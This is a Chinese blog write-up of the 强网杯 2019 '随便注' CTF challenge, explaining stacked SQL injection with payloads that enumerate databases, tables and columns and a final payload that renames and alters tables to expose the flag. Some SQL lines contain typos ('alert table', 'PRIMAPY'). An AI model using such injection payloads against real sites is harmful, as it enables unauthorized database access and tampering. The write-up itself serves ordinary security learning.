[强网杯 2019]随便注

最新推荐文章于 2024-05-16 14:20:53 发布
最新推荐文章于 2024-05-16 14:20:53 发布
阅读量846 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/102652850
版权

1知识点

1.1MySQL命令

原来堆叠注入竟然真的有用,真的就像这道题所说的,安全和开发缺一不可。很久没用过堆叠注入了。复习一下把。

  • 查看所有数据库:0’;show databases;%23
  • 查看当前数据库的表: 1’;show tables;%23
  • 查看某个表的某个字段: 0’;show columns from users;%23
  • 把users表名改为user:rename tables users to user
  • 把flag字段改为data:alert table words change flag data varchar(100);%23

在表中增加一个字段:
CREATE TABLE TABLE_1
(
       ID INT UNSIGNED NOT NULL PRIMARY KEY AUTO_INCREMENT,
       // ID列为无符号整型,该列值不可以为空,并不可以重复,而且自增。

)
AUTO_INCREMENT = 100;(ID列从100开始自增)
PRIMAPY是主键的意思,表示定义的该列值在表中是唯一的意思,不可以有重复。
UNSIGNED是无符号的意思,代表该字段没有正负。
AUTO_INCREMENT可以理解为自动递增的意思,每增加一条记录,值会自动加1。(例如在上面的例子中,ID列每增加一条记录,便会从100自增) 。

2.payload

还是自己写的题太少了,思路太狭窄了。用道了堆叠注入,因为题目过滤的很严,所以我们可以把words表和1919810931114514表给换一下,我们猜测php代码为select * from words where id = '{$_GET['inject']}';。至于找道这些数据库、表和字段的办法,我上面已经写过了。
直接给出payload:

1;rename table words to word1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#
沐目_01
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[安洵杯 2019]easy_web
qq_40327508的博客
05-30 616
[安洵杯 2019]easy_web 考点:MD5强类型绕过,命令入绕过 进入发现img参数可能有任意文件下载 通过2次base64解密和一次hex转字符串 得到555.png 再通过相同的方式获取到了index.php的源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img'])
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf[强网杯 2019]随便 1(超详细,三种解法)
最新发布
2401_84968222的博客
05-16 289
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[强网杯 2019]随便 Writeup(超级详细)
StevenOnesir的博客
11-23 1103
这道题应该算是非常熟悉、经典且基础的一道题目,在攻防世界、Buu等平台上非常常见,适合作为sql入的入门学习题目。 作者说了一句:开发安全缺一不可。这也是我想说的。 废话不多说,步入正题。 首先进入界面我们可以看到一个输入框,结合题目信息我们可以判断这就是入点。 我们先输入: 1’ 尝试一下。 果然出现了回显报错: error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2495
以buuctf的强网杯2019为例的堆叠
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1385
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
CTF-Web-Sql入-强网杯 2019]随便
weixin_42566218的博客
02-21 1509
CTF-Web-Sql入-强网杯 2019]随便 题目链接:BUUCTF 类型:sql入 知识点:堆叠入、mysql句柄操作(handler) 解题过程 方法1 测试入点发现GET型字符入, ?inject=1' or '1'='1 order by爆破字段2 ?inject=1' order by 3%23 配合union select发现过滤规则 ?inject=1' union select 1,2%23 没有过滤分号,测试堆叠入成功,查询当前数据库的
mysql数据库show的常用命令说明
coujiongyong0208的博客
10-24 183
show columns from table_name from database_name; 或show columns from database_name.table_name; -- 显示表中列名称。 ...
[强网杯 2019]随便1 解题思路(详细版)
qq_61861243的博客
09-24 300
1、首先通过题目,及页面提示,考虑到题目应该利用sql入进行解决,首先试一下万能密码,查看一下回显内容2、既然这样我们就查询一下数据库中的所有表格1';#,这里我们可以得到两个表格words、19198109311145144、查看一下两个表格的信息, 1';#查询words表找到了两个属性一个id 一个data;1';#查询1919810931114514表我们发现有关flag的提示词。3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容。
[强网杯 2019]随便 1
tomatoff的博客
03-14 2827
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3993
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值